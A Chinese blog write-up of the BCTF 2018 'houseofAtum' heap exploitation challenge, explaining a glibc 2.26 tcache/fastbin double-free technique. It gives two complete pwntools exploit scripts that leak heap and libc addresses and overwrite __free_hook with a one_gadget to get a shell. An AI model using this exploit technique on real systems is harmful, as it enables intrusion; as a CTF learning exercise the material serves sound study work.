BCTF2018-houseofatum-write-题解

最新推荐文章于 2022-12-19 01:30:00 发布
最新推荐文章于 2022-12-19 01:30:00 发布
阅读量337 收藏 1
点赞数
分类专栏: pwn 文章标签: ubuntu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/z2876563/article/details/120691474
版权

先把ld和Libc给换成题目给的

patchelf --set-interpreter ./glibc-all-in-one/libs/2.26-0ubuntu2_amd64/ld-2.26.so  --replace-needed ./glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc.so.6 ./glibc-all-in-one/libs/2.26-0ubuntu2_amd64/libc-2.26.so houseofAtum

程序分析

这里只进行一些简单的分析,其他的博客分析的很详细了

bigeast@ubuntu:~/Desktop/ctf$ ./houseofAtum 
1. new
2. edit
3. delete
4. show

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  int v3; // eax

  initialize(argc, argv, envp);
  while ( 1 )
  {
    while ( 1 )
    {
      while ( 1 )
      {
        v3 = menu();
        if ( v3 != 2 )
          break;
        edit();
      }
      if ( v3 > 2 )
        break;
      if ( v3 != 1 )
        goto LABEL_13;
      alloc();
    }
    if ( v3 == 3 )
    {
      del();
    }
    else
    {
      if ( v3 != 4 )
LABEL_13:
        exit(0);
      show();
    }
  }
}

int alloc()
{
  int i; // [rsp+Ch] [rbp-4h]

  for ( i = 0; i <= 1 && notes[i]; ++i )
    ;
  if ( i == 2 )
    return puts("Too many notes!");
  printf("Input the content:");
  notes[i] = malloc(0x48uLL);
  readn(notes[i], 72LL);
  return puts("Done!");
}

这里ull表示无符号长整形,ll表示长整型,就是8字节。
这里72=0x48,72LL表示用8字节来存储72。没有在字符串末尾添加/x00,而且没有初始化,可能存在泄漏。利用visit或者show函数打印的时候就能泄漏了。

unsigned __int64 del()
{
  int v1; // [rsp+0h] [rbp-10h]
  char v2[2]; // [rsp+6h] [rbp-Ah] BYREF
  unsigned __int64 v3; // [rsp+8h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  printf("Input the idx:");
  v1 = getint();
  if ( v1 >= 0 && v1 <= 1 && notes[v1] )
  {
    free((void *)notes[v1]);
    printf("Clear?(y/n):");
    readn(v2, 2uLL);
    if ( v2[0] == 121 )
      notes[v1] = 0LL;
    puts("Done!");
  }
  else
  {
    puts("No such note!");
  }
  return __readfsqword(0x28u) ^ v3;
}

当clear选择n的时候,不会清空note数组的指针,而edit和show都是通过这个来判断一个note是否存在。

漏洞利用的参考程序

参考链接,https://changochen.github.io/2018-11-26-bctf-2018.html
受上文的启发,虽然他的图画错了(头节点不应该指向其fd而应该指向chunk头)

实验该参考程序过程发现了一个小现象:

当malloc(0x20),分配的chunk的size为0x21
当malloc(0x28),分配的chunk的size为0x21
当malloc(0x29),分配的chunk的size为0x41
0x20=32字节,是分配一个chunk的最小空间=presize+size+fd+bk=32字节。size后面多1表示上一个chunk的状态。可以看到当malloc(28),显示的size仍然为0x21,肯定是和后一个chunk的presize复用了。

#include <unistd.h>
#include <stdlib.h>
#include <malloc.h>
void main(){
void *a = malloc(0x28);
void *b = malloc(0x28);
// fill the tcache
for(int i=0; i<7 ;i++){
    free(a);
}
sleep(0);
free(b);//fast bin

//What will happen with this:
free(a);// fast bin
}

free b后:

pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x555555757000
Size: 0x251

Free chunk (tcache) | PREV_INUSE
Addr: 0x555555757250
Size: 0x31
fd: 0x555555757260

Free chunk (fastbins) | PREV_INUSE
Addr: 0x555555757280
Size: 0x31
fd: 0x00

Top chunk | PREV_INUSE
Addr: 0x5555557572b0
Size: 0x20d51

pwndbg> bins
tcachebins
0x30 [  7]: 0x555555757260 ◂— 0x555555757260 /* '`ruUUU' */
fastbins
0x20: 0x0
0x30: 0x555555757280 ◂— 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
empty
largebins
empty

free a之后:
发现 a也进了fast bin里面,而且其fd指向了b的presize字段。这样我们就可以通过malloc从tcache bin里得到a的fd,从而修改b的presize,甚至presize后面的size等内容

pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x555555757000
Size: 0x251

Free chunk (fastbins) | PREV_INUSE
Addr: 0x555555757250
Size: 0x31
fd: 0x555555757280

Free chunk (fastbins) | PREV_INUSE
Addr: 0x555555757280
Size: 0x31
fd: 0x00

Top chunk | PREV_INUSE
Addr: 0x5555557572b0
Size: 0x20d51

pwndbg> bins
tcachebins
0x30 [  7]: 0x555555757260 —▸ 0x555555757280 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x555555757250 —▸ 0x555555757280 ◂— 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
empty
largebins
empty

漏洞利用思路

我们的目标是最终执行system(’/bin/sh’),而且是通过堆来完成。在《HITB CTF 2018 gundam》中,我们通过动态获得libc基地址,进而计算出_free_hook地址和system地址,想方设法在_free_hook地址处写入system地址,再创建1个内容为’/bin/sh’的chunk,然后释放,就可以触发_free_hook,最终执行system(’/bin/sh’)。这道题同样可以采取这种思路。1.要动态获得libc基地址,就要用到unsorted bin,在tcache的count为7的情况下,将符合unsorted bin大小的chunk释放到unsorted bin中。该chunk前向指针fd和后向指针bk的值就是要泄露的地址(详细分析见上一篇《HITB CTF 2018 gundam分析》)。

2.题目中创建的house of Atum chunk的大小为0x51。显然,这样chunk释放后只能进入tcache bin和fast bin,要想使其进入unsorted bin,就得改变指定chunk的大小。

3.要在_free_hook地址处写入system地址,就得构建1个以_free_hook地址为数据区地址的chunk,即_free_hook-0x10为起始地址的chunk,以system地址作为内容参数。
以下分析和调试过程基于以上3点考虑,通过对堆块chunk的灵活操作,成功执行获得shell。

泄露Chunk的fd地址

连续释放同一个chunk7次后,此时通过show即可获得chunk 0的fd的地址,书本中记为heap_addr
--------
tcachebin[7] -> chunk 0.fd <- chunk 0.fd
fastbin[] :null
--------

伪造chunk

动态获得了heap_addr,即chunk0的next指针,后面该如何利用?
根据前面分析,要获得libc的基地址,就要改变chunk0的大小为0x91。chunk0的size域位于chunk0头部16个字节的后半部分中,可以考虑创建1个以chunk0-0x10为起始地址的chunk1,将chunk0的新的size值(0x91)作为chunk1的内容。要从tcachebin中分配chunk1时,前提是chunk1在tcachebin中,有两种方式可以使chunk1(chunk0-0x10为起始地址)进入tcachebin:一种是构造tcache bin的double free 然后构造chunk0-0x10为起始地址的fake chunk,另一种是将chunk1链接到fastbin中某个chunk后面,这样当chunk被从fastbin中分配时,其后面的chunk1就会被移到tcache中。我们首先分析第一种方法:
因为题目限制只能创建2个chunk,所以构造了faka chunk后,已经创建了2个chunK了,此时这两个chunk都是指向chunk 0的,无论释放哪一个,都会导致faka chunk丢失。
如下,两个已经创建的chunk都是指向0x5616cec43260的,无论释放哪一个都会导致fake chunk 0x5616cec43250的丢失。
所以本题用了两次把fastbin中的fake chunk转移到tcache bin

泄露libc地址

连续释放chunk0 7次,将会使chunk0进入0x90大小的tcachebin中,再释放1次,chunk0将会进入unsortedbin。就可以按像gundam那样泄漏glibc地址,就是先

分析tcache的结构体是位于堆的低地址的最开头,也是一个chunk。

为什么创建的是0x50大小的Chunk,而不是0x48?

我们看到代码中是malloc(0x48),0x48是userdata的大小,还需要加上presize和size的大小,也就是0x48+0x10=0x58,然后由于该chunk被使用,所以会占用下一个chunk的presize字段,所以0x58-0x8=0x50。所以每次只用分配0x50大小的chunk.

带详细注释的代码

from pwn import *

io = process('./houseofAtum')
libc = ELF('././glibc-all-in-one/libs/2.26-0ubuntu2_amd64/libc-2.26.so')
context.log_level='debug'
def new(cont):
	io.sendlineafter('choice:','1')
	io.sendafter("content:",cont)

def edit(idx,cont):
	io.sendlineafter('choice:','2')
	io.sendlineafter('idx:',str(idx))
	io.sendafter("content:",cont)

def delete(idx,x):
	io.sendlineafter('choice:','3')
	io.sendlineafter('idx:',str(idx))
	io.sendlineafter('(y/n):',x)

def show(idx):
	io.sendlineafter('choice:','4')
	io.sendlineafter('idx:',str(idx))

def leak_heap():
	global heap_addr
	new('A') 初始chunk 0,记住这是初始的chunk0空间,后面会反复用到这个空间。
	
	new(p64(0)*7 + p64(0x11))  
	# 为什么分配两个0x50的chunk? 因为tcache bin和fast 
	# bin都不会清除preuse,所以在后面将0x90大小的fake chunk放入unsorted 
	# bin时会检查下一个chunk的preuse位置,若为0则会报错,所以这里一定要在56个字节之后构造一个0x11。
	
	delete(1,'y') #构造完就没用了,可以删掉了
	
	for i in range(6): #构造double free填满tcache bin
		delete(0,'n')
		
	show(0)
	io.recvuntil("Content:")
	heap_addr = u64(io.recv(6).ljust(8,'\x00')) 
	#输出自己的user data的地址
	log.info("heap_addr: 0x%x" % heap_addr)

def leak_libc():
	global libc_base
	delete(0,'y') #指向初始chunk0的空间,
	# 输出完heap_addr也没用了,所以要删掉,会被放进fastbin。
	# 此时由于最后一个进入fastbin的chunk的fd会被清0,
	# 所以tcachebin的next指针会被清0。
	# 此时,
	# tcache bin[7]:chunk 0.fd -> 0
	# fasbin:chunk 0.presize -> 0

    # 为什么在这之后不再直接free一个chunk 0直接修改chunk 0的size呢,
    # 再free一个chunk 0它会进入fastbin,
    # 会被fastbin检测出double free,
    # 上面的参考程序要修改的chunk是另外的chunk,不能是double free的chunk。
    # 所以行不通。
    # 所以要间接的修改size。
    
	new(p64(heap_addr-0x20)) 
	# 此时得到chunk0指向 初始的chunk0,并且改变了chunk 0的fd ,
	# 此时,
	# tcache bin[6]:0
	# fasbin:chunk 0.presize -> chunk0.presize-0x10 -> 0 ,
    # 这里修改后
    # 在分配内存的时候不会有任何检查其头部?
    # 分配的时候fastbin会检查头部是否符合当前fastbin的大小,
    # 但是我们这个chunk我们不会当它在fastBin的时候就分配它。
    # 后面我们会先把它转移到tcachebin,而转移到tcache bin的过程貌似不会检查其Size,
    # 而在tcache bin的时候再分配它出去,tcache bin不会检查其头部大小
    # 同时,还发现entries指针被清空居然不和counts做检查!!!

    
	new('A') #此时得到chunk1指向 初始的chunk 0,
    # 由于tcache的entries指针已经被清空,堆块会从fastbin取出。
    # 剩下的堆块会被整理到tcache,
    # 于是fd指针的地址(chunk0.presize-0x10)会被写入tcache entries,同时counts加1等于7
	# 此时, 
	# tcache bin[7]:chunk0.presize-0x10 -> 0
	# fasbin:0, 
	# 这一步就是为了把fastbin里面的指向chunk0的presize-0x10的chunk放入tcache bin
	# 小发现:把fastbin剩余的chunk放入tcache bin会导致tcache bin的count数量改变。

	delete(1,'y') # 上面的工作完成后这个Chunk就没用了,释放掉,进入fastbin。
	#此时 
	# tcache bin[7]:chunk0.presize-0x10 -> 0
	# fasbin: chunk0.presize
	
	new(p64(0)+p64(0x91)) ##指向初始的chunk.presize-0x10的空间,
	# 此时拿到了fake chunk,fake chunk的user data指向初始chunk 0 的presize
	# 此时,
	# tcache bin 0x50 [6]: 0
	# fasbin 0x50 : chunk0.presize 
	# 此时初始的chunk 0的size已经被修改了。变成了0x91,即大小为0x90。
	
	for i in range(7):
		delete(0,'n') #指向初始的chunk0的空间
	# 此时会填满tcache 为0x90的bin,并且会改写0x50的fast bin。
	# 即此时
	# tcache 0x50 bin[6]: 0 
	# tcache 0x90 #bin[7]:chunk0.fd->chunk0.fd 
	# fasbin 0x50: chunk0.presize->chunk0.fd ,

	delete(0,'y') #指向初始的chunk0的空间
	# 此时进入Unsorte bin.
	# 此时 , 
	# tcache 0x50 bin[6]: 0 ,
	# tcache 0x90 bin[7]:chunk0.fd-> main_arena+88
	# fasbin 0x50 : chunk0.presize -> main_arena+88
	# unsorte bin:chunk0.presize -> main_arena+88 
	
	edit(1,'A'*0x10)
	# 此时会修改初始chunk0.presize-0x10的usedata,即会修改chunk0的presize和size字段
	# 这样后面打印的话方便找到打印的地址在哪。
	# 因为chunk0 已经被完全删掉了,
	# 或者之前不完成删掉打印完再删掉也行,反正现在只剩chunk1了
	
	show(1)
	io.recvuntil('A'*0x10)
	libc_base = u64(io.recv(6).ljust(8,'\x00'))-0x3abc78
	log.info("libc base:0x%x" % libc_base)
	debug(1) 
	
def pwn():
	one_gadget = libc_base + 0xdd752
	free_hook = libc_base + libc.symbols['__free_hook']
	edit(1,p64(0)+p64(0x51)+p64(free_hook-0x10)) 
	# 修改了初始的Chunk0大小为0x50,为什么要改回来?
	# 因为后面要从fastbin中new一个chunk0了,
	# fastbin会检查size释放应该在此fastbin中。
	# 修改了初始的chunk0的fd为free_hook-0x10
	# 此时 , 
	# tcache 0x50 bin[6]: 0 ,
	# tcache 0x90 bin[7]:chunk0.fd-> free_hook-0x10
	# fasbin 0x50 : chunk0.presize -> free_hook-0x10
	# unsorte bin:chunk0.presize 的fd -> free_hook-0x10 ,chunk0.presize 的bk -> main_arena+88
	

	new('A') chunk0 ,因为这里要new 所以前面必须把chunk0 改回0x50大小
	# 指向初始chun0空间
	# 这里的作用是把free hook放进tcache bin 0x50
	# 此时 , 
	# tcache 0x50 bin[7]: free_hook
	# tcache 0x90 bin[7]:chunk0.fd-> free_hook-0x10
	# fasbin 0x50 : 
	# unsorte bin:chunk0.presize 的fd -> free_hook-0x10 ,chunk0.presize 的bk -> main_arena+88
	
	delete(0,'y')
	# 回收chunk0,没用了。回收进fast bin 0x50 
	# 此时 , 
	# tcache 0x50 bin[7]: free_hook
	# tcache 0x90 bin[7]:chunk0.fd-> free_hook-0x10
	# fasbin 0x50 : chunk0.presize
	# unsorte bin:chunk0.presize 的fd -> free_hook-0x10 ,chunk0.presize 的bk -> main_arena+88
	
	new(p64(one_gadget)) #chunk0
	# 取出free hook的空间,然后修改
	# 此时 , 
	# tcache 0x50 bin[7]: 0
	# tcache 0x90 bin[7]:chunk0.fd-> free_hook-0x10
	# fasbin 0x50 : chunk0.presize
	# unsorte bin:chunk0.presize 的fd -> free_hook-0x10 ,chunk0.presize 的bk -> main_arena+88
	
	io.sendlineafter("choice:",'3')
	io.sendlineafter(":",'0')
	io.interactive()
def debug(id):
    log.info('check point %d' % id)
    gdb.attach(io)
    pause()
if __name__=='__main__':
	leak_heap()
	leak_libc()

可直接运行的代码

from pwn import *

io = process('./houseofAtum')
libc = ELF('./glibc-all-in-one/libs/2.26-0ubuntu2_amd64/libc-2.26.so')
context.log_level='debug'
def new(cont):
	io.sendlineafter('choice:','1')
	io.sendafter("content:",cont)

def edit(idx,cont):
	io.sendlineafter('choice:','2')
	io.sendlineafter('idx:',str(idx))
	io.sendafter("content:",cont)

def delete(idx,x):
	io.sendlineafter('choice:','3')
	io.sendlineafter('idx:',str(idx))
	io.sendlineafter('(y/n):',x)

def show(idx):
	io.sendlineafter('choice:','4')
	io.sendlineafter('idx:',str(idx))

def leak_heap():
	global heap_addr
	new('A')# chunk 0
	#debug(1)
	new(p64(0)*7 + p64(0x11)) #chunk 1
	#debug(2)
	delete(1,'y') #delete chunk 1
	#debug(3)
	for i in range(6):
		delete(0,'n')
	#debug(4)
	show(0)
	io.recvuntil("Content:")
	heap_addr = u64(io.recv(6).ljust(8,'\x00'))
	log.info("heap_addr: 0x%x" % heap_addr)
	#new(p64(heap_addr-0x10)) #chunk 1 fake chunk
	#debug(1) 
	#delete(1,'y') # delete chunk 1 
	#debug(2) 
	
def leak_libc():
	global libc_base
	delete(0,'y') #fastbin
	#debug(0)
	new(p64(heap_addr-0x20)) #tcache bin get and fast bin add fake chunk
	#debug(1)
	new('A') # fastbin get and fastbin fake chunk put to tcache bin
	#debug(2)
	delete(1,'y') # put to fastbin
	new(p64(0)+p64(0x91)) #fake size
	
	for i in range(7):
		delete(0,'n')
	
	#debug(1) 
	delete(0,'y')
	#debug(2) 
	edit(1,'A'*0x10)
	#debug(2) 
	show(1)
	io.recvuntil('A'*0x10)
	libc_base = u64(io.recv(6).ljust(8,'\x00'))-0x3dac78
	log.info("libc base:0x%x" % libc_base)
	#debug(1) 
def pwn():
	one_gadget = libc_base +  0xfcc6e
	free_hook = libc_base + libc.symbols['__free_hook']
	edit(1,p64(0)+p64(0x51)+p64(free_hook-0x10))
	#debug(1) 
	new('A')
	#debug(1) 
	delete(0,'y')
	#debug(2) 
	new(p64(one_gadget))
	#debug(3) 
	io.sendlineafter("choice:",'3')
	io.sendlineafter(":",'0')
	io.interactive()
def debug(id):
    log.info('check point %d' % id)
    gdb.attach(io)
    pause()
if __name__=='__main__':
	leak_heap()
	leak_libc()
	pwn()

新发现:不同Libc的unsorte bin在main_arena的偏移不同,Libc2.26是88,Libc2.27是96.

总结:

gundam和houseofAtum这两道题都是利用了LIBC2.26中tcache bin可以double free的特点。

gundam:

由于每次build的chunk大于0x90,所以可以重复释放8次同一个chunk,然后在unsortebin中泄漏libc地址。然后,直接在tcache中构造double free然后把free_hook作为fake chunk链接到tcache bin中,然后修改free hook。

houseofAtum:

由于每次build的chunk只有0x50大小,不能被放入unsorted bin,导致无法泄漏Libc地址。所以首先要考虑修改chunk的大小,要修改chunk的大小,只能通过构造fake chunk来修改。而由于限制只能new 2个chunk,所以不能直接在tcache bin中构造double free来链接fake chunk(这点已经在上面分析过了),所以只能通过把fastbin中的fake chunk移入tcache bin中来构造fake chunk。
构造完fake chunk后就能修改chunk的大小,从而放入Unsorted bin中泄漏libc地址。泄漏完Libc地址后,又要构造fake chunk来修改free_hook,构造方法同上,也是要在fast bin中构建完后移入tcache bin。

参考文献:
https://bbs.pediy.com/thread-269105.htm

one-gadget安装

sudo apt -y install ruby
sudo gem install one_gadget
需要满足一些条件,
比如: [rsp+0x30] == NULL

bigeast@ubuntu:~/Desktop/ctf$ one_gadget ./glibc-all-in-one/libs/2.26-0ubuntu2_amd64/libc-2.26.so 
0x47c46 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x47c9a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xfcc6e execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL

0xfdb1e execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL

知识点的复习

参考连接:
https://blog.csdn.net/qq_41453285/article/details/97613588

通过这道题又复习和捋清楚了一些bin的存储方式:
主线程的Main_arena保存在libc.so的数据的里,其中包括了fastbinsY和bins。
fastbin和Unsortedbin 是后进先出,其他bins是先进先出。
fastbin只用到fd指针,后进来的chunk放在链表头。fd指向上一个进来链表的节点。第一个进来的chunk的fd指向的是特殊的“0”,代表前面没有chunk。
而且fastbin里面的chunk不会进行合并操作,只有当调用malloc_consolidate()的含时候才会取出来与相邻的freechunk合并,所以fast bin的chunk的下一个chunk的PRV INUSE始终为1,处于使用状态。

以下我们通过两个参考程序
参考程序:

#include <unistd.h>
#include <stdlib.h>
#include <malloc.h>
 
int main()
{
    int size=0x10;
    int size2=0x20;
    int *p1=malloc(size);
    int *p2=malloc(size);
    int *p3=malloc(size2);
 
    sleep(0);  //只为了程序打断点,没有其他作用
    free(p1);
    free(p2);
    free(p3);
    return 0;
}

其他Bin如Unsorted bin,用到fd和bk指针,是先进先出,后进来的chunk放在链表头。后进来的chunk的bk指向mainarena+88,即unsortedbin数组的存储位置,fd指向上一个进来链表的节点,第一个进来的chunk的fd指向mainarena+88,即unsortedbin数组的存储位置。
参考程序:

#include <unistd.h>
#include <stdlib.h>
#include <malloc.h>
 
int main()
{
    int size=0x100;
    int *p1=malloc(size);
    int *temp=malloc(size); //防止p1与p2合并
    int *p2=malloc(size);   
    int *p3=malloc(size);   //防止p2被top chunk合并
 
    sleep(0);
    free(p1);
    free(p2);
    return 0;
}
大东bigeast
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
掘安平台Writeup(持续解题)
notwiner的入坑笔记
01-29 1556
掘安平台Writeup 刷一部分sqli-labs,先掘安平台做点CTF,主要目的是练习web,MSIC和crypto则顺便。 misc welcome 没什么说的,关注公众号jasafe110然后发flag就行。 hello 流量分析基础题目,工具wireshark 导入后为下图界面 点工具栏的Protocol使之通过传输协议排序,或者直接通过上面的过滤器,找TCP和HTTP即可(基础类型的一...
线上ISCC2018 wp 部分writeup解题思路[xueqi]
XUEQI的博客
04-16 1316
2018年五月份开始的 一年一届的iscc 2018 ctf大赛全国赛区,线上比赛!此为部分解体思路过程一、WEB 1.Web 比较数字大小 重点在这里,修改为4,提交9999.,拿到flag 2.web01 PHP弱类型 用数组绕过 3.web本地的诱惑 小明扫描了他心爱的小红的电脑,发现开放了一个8013端口,但是当小明去访问的时候却发现只允许从本地访问,可他心爱的小红不敢让...
BCTF Writeup
weixin_34067102的博客
03-08 481
我是狗汪汪 · 2014/03/14 17:53team:我是狗汪汪author:redrain,金龟子,ztz,hellove,cbuteng,琴心剑气,saline0x00 MISCMISC100初来乍到描述米特尼克刚到中国人生地不熟,想要找到一些中国的黑客朋友帮助他,他知道Capture The Flag夺旗竞赛是黑客云集的地方,于是也报名参加了中国第一次全国性的CTF大赛 @BCTF百度杯...
安恒杯月赛之以赛战“疫”-- writeup解题思路
BlusKing
02-27 2612
CRYPTO-古典密码1 iodj{36g9i2777 符号不变进行凯撒移位 flag{36d9f2777 -... ----. ..--- -... .- -.-. ...-- ----. .- .- ..--- 摩斯解码 b92bac39aa2 a0dd}b6942c07 栅栏密码https://www.qqxiuzi.cn/bianma/zhalanmi...
河南省第四届”金盾信安杯”网络安全大赛writeup(过程,解题思路)
路baby的博客
12-19 3265
河南省第四届”金盾信安杯”网络安全大赛writeup(过程,解题思路)Misc-qianda0_Sdoku​编辑 Misc-盗梦空间 Misc-Megmi Misc-数据泄露01-账号泄露追踪 Web-eZphp2 Web-EzPHP Web-有来无回 Crypto-小菜一碟 Crypto-RRSSAA​编辑 Crypto-simpleR
BCTF-Writeups.rar
09-30
【标题】:“BCTF-Writeups.rar”是一个关于网络安全竞赛BCTF的解题报告集合,其中可能包含了参赛者们对于比赛中的各种技术挑战的分析、解决方案和心得。 【描述】:这个压缩包文件“BCTF-Writeups.rar”暗示了其...
ctf-archives:CTF档案
05-11
收集CTF挑战。 周大福 事件 写作 CTF时间 0xL4ugh ...BCTF 2018年 CTF时间 BSides阿尔及尔 2020年质量 CTF时间 BSidesBOS 2020年 CTF时间 BSides堪培拉 2021年 CTF时间 BSides新德里 2020年 CTF
writeup:CTF挑战撰写
05-28
自2018年以来,r3kapig是一个统一的CTF团队,主要来自Eur3kA和FlappyPig。 r3kapig是可以烧烤和烧烤的美味佳肴,团队的任务是为主人提供最美味的食物。 :P 我们将在此处发布我们的官方文章。 有关更多信息,请...
BCTF_Writeups
03-14
百度杯BCTF线上赛前8名队伍的Writeup,大家可以学习一下,推荐看217写的。
玩转堆-堆漏洞的利用技巧.docx
最新发布
01-10
习题包括 UAF、Double Free 等, DEFCON CTF Qualifier 2014: shitsco、BCTF 2016: router、HCTF2016 5-days 等。 六、结语 堆溢出是一种常见的漏洞,了解堆溢出的利用思想和防护策略是非常重要的。通过学习和实践...
BUUCTF N种方法解决 writeup
zhangzhaolin12的博客
10-10 552
下载后是一个可执行文件,但是又是在misc里的题目一般先丢到010Editor里,果然是一个图片的base64的编码。这里有很多方法,可以使用在线工具,或者使用一个HTML里的img标签。 再有浏览器打开就可以直接解析。解析出来是一个二维码,可以使用手机扫码,也可以使用工具。 ...
HITBCTF2018 UPLOAD writeup
1CHIG0的博客
04-14 559
界面如下,大概是一道文件上传题F12一下看到注释。随便上传一张图片得知会将上传文件名称修改,并保持格式不变。试一试注释的方法得到大概是可以读到上传文件的一些信息。目标是找到文件所在路径,这一点在head里也有提示。于是凉了,不会找,思路知道是写脚本爆破,但是完全不知道怎么匹配上级目录,明白这又肯定是什么自己不知道的奇淫技巧。等比赛结束,看师傅们的WP这样子:https://nandynarwhal...
攻防世界web新手题解writeup
devilare的博客
09-09 2507
攻防世界web新手题 1.view_source 题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 题目场景: http://220.249.52.133:58537初级题,按下F12查看网页源码得到flag 2.get_post 题目描述:X老师告诉小宁同学HTTP通常使用两种请求方法,你知道是哪两种吗? 题目场景: http://220.249.52.133:35963打开场景发现提示在域名栏输入**/?a=1**得到新的提示 这里我们可以用到一个火狐插件Max Ha
攻防世界 pwn进阶区解法 write up(一)
qq_46441427的博客
03-01 374
实时数据监测 找信息 没有发现canary,没有开启PIE和NX 查看ida 发现有一个printf,这里是fgets,可能会用到格式化字符串漏洞,运行一下程序 结合ida的分析我们可知,要把这个值改成0x2223322,那结合之前的printf,可以确定是格式化字符串漏洞 给了我们地址,那我们的payload就以地址为开头,因为是p32,所以后面35795746要减4,构成%35795742d%偏移量n$ 然后确定偏移量: 总共,从A到41包括A有12个,偏移量=12 所以得到payload
实验吧 CTF 题目之 密码学 Writeup 通关大全 - 1
DarkN0te
02-24 1631
文章目录概述Writeup变异凯撒传统知识+古典密码what's wrong with thistry them all 概述 解除CTF也有很多年了,但是真正的将网上的题目通关刷题还是没有过的,同时感觉水平下降的太厉害,这两个月准备把网上目前公开有的CTF环境全部刷一遍,同时收集题目做为素材,为后面的培训及靶场搭建做好准备。本文是实验吧2018年7月8日前所有密码类的题目通关Writeup。 W...
攻防世界Misc新手练习区WriteUp大全
D-R0s1的博客
09-02 4007
0x01 写这篇博客的目的 对于CTF中的Misc来说,做题经验显得十分重要,而做题经验的获得很大一部分取决于刷题量。为了避免大家在刷题过程到处搜WriteUp浪费时间,现在把我的一些做题方法分享出来,希望对大家有帮助。当然,大家有更好的解决方法欢迎在评论区留言,互相学习,共同进步。 0x02 解题过程 1. this is flag 点开这个题目直接显示flag 2.ext3 a.把文件放进虚拟...
【UNCTF】逆向WriteUp以及出题笔记
古月浪子的博客
11-16 2604
【UNCTF】逆向WriteUp以及出题笔记WriteUpre_checkin反编译babypyeasyMazeezRustezvmezreTrapBetterCPU出题笔记CTFilter原神 WriteUp re_checkin IDA打开,搜索字符串 查看交叉引用,定位到主函数 可以看到直接比较字符串 由于Str2在IDA中没有出现明文值,因此直接x64dbg打开,主函数下断,即可看到flag 反编译 这道题…有意思??? 正规解题步骤参照下面的babypy,不过这道题据说运行就有flag?!
实验吧——WriteUp&&涨姿势(1)
困难是否磨灭你的自信
04-15 1781
WP1.NSCTF web200 2.Forbidden 3.猫抓老鼠涨姿势1.上传绕过 2.Guess Next Session 3.天下武功唯快不破 4.what a fuck!这是什么鬼东西? 5.头有点大NSCTF web200
功防世界Web高手进阶Writeup
秋叶依剑
11-17 832
攻防世界Web进阶区 文章目录攻防世界Web进阶区0x01. Cat解题思路附注0x02. ics-05解题思路0x03. mfw解题思路 0x01. Cat 难度系数 1.0 题目来源: XCTF 4th-WHCTF-2017 题目描述: 抓住那只猫 题目场景: http://111.198.29.45:43180/ 具体参见攻防世界 题目附件:无 解题思路 尝试提交空域名,返回I...
CTF_and_Real_World.pdf
01-02
CTF_and_Real_World.pdf

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值